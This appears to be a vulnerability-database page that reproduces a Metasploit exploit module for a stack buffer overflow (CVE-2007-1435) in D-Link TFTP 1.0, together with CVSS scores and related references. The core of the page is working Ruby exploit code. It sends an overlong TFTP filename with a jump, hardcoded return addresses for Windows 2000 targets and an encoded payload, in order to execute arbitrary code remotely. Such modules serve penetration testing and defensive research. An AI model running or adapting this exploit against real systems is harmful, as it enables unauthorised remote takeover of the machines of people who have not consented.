Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
metasploitLSO <[email protected]>, aushack <[email protected]>MSF:EXPLOIT-WINDOWS-TFTP-DLINK_LONG_FILENAME-
HistoryFeb 26, 2009 - 8:19 a.m.

D-Link TFTP 1.0 Long Filename Buffer Overflow

2009-02-2608:19:01
LSO <[email protected]>, aushack <[email protected]>
www.rapid7.com
12

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

JSON

This module exploits a stack buffer overflow in D-Link TFTP 1.0. By sending a request for an overly long file name, an attacker could overflow a buffer and execute arbitrary code. For best results, use bind payloads with nonx (No NX).

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Udp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'D-Link TFTP 1.0 Long Filename Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in D-Link TFTP 1.0.
        By sending a request for an overly long file name, an attacker
        could overflow a buffer and execute arbitrary code. For best results,
        use bind payloads with nonx (No NX).
      },
      'Author'         =>
        [
          'LSO <lso[at]hushmail.com>', # Exploit module
          'aushack', # Refs, stability, targets etc
        ],
      'References'     =>
        [
          [ 'CVE', '2007-1435' ],
          [ 'OSVDB', '33977' ],
          [ 'BID', '22923' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'    => 1024,
          'BadChars' => "\x00",
          'Compat'   =>
          {
            'ConnectionType' => '-reverse',
          },
        },
      'SaveRegisters'  => [ 'ecx', 'eax', 'esi' ],
      'Platform'       => 'win',

      'Targets'        =>
        [
          # Patrick tested OK 20090228
          ['Windows 2000 SP4 English', { 'Ret' => 0x77e1ccf7 } ], # jmp ebx
          ['Windows 2000 SP3 English', { 'Ret' => 0x77f8361b } ], # jmp ebx
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2007-03-12',
      'DefaultTarget' => 0))

    register_options(
      [
        Opt::RPORT(69)
      ], self)
  end

  def exploit
    connect_udp

    print_status("Trying target #{target.name}...")

    juju = "\x00\x01"
    juju << Rex::Text.rand_text_alpha_upper(581)
    juju << Rex::Arch::X86.jmp_short(42)
    juju << Rex::Text.rand_text_alpha_upper(38)
    juju << [target.ret].pack('V') + payload.encoded

    udp_sock.put(juju)

    handler
    disconnect_udp
  end
end

Related

packetstorm 1
cvelist 1
nvd 1
exploitdb 2
securityvulns 1
prion 1
cve 1
packetstorm
packetstorm
D-Link TFTP 1.0 Long Filename Buffer Overflow
2009-11-26 00:00:00
cvelist
cvelist
CVE-2007-1435
2007-03-13 19:00:00
nvd
nvd
CVE-2007-1435
2007-03-13 19:19:00
exploitdb
exploitdb
D-Link TFTP 1.0 - &#039;Filename&#039; Remote Buffer Overflow (Metasploit)
2010-05-09 00:00:00
D-Link TFTP 1.0 - Transporting Mode Remote Buffer Overflow
2007-03-12 00:00:00
securityvulns
securityvulns
D-Link TFTP server memory corruption
2007-03-18 00:00:00
prion
prion
Buffer overflow
2007-03-13 19:19:00
cve
cve
CVE-2007-1435
2007-03-13 19:19:00

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

JSON
Related for MSF:EXPLOIT-WINDOWS-TFTP-DLINK_LONG_FILENAME-
packetstorm1cvelist1nvd1exploitdb2securityvulns1prion1cve1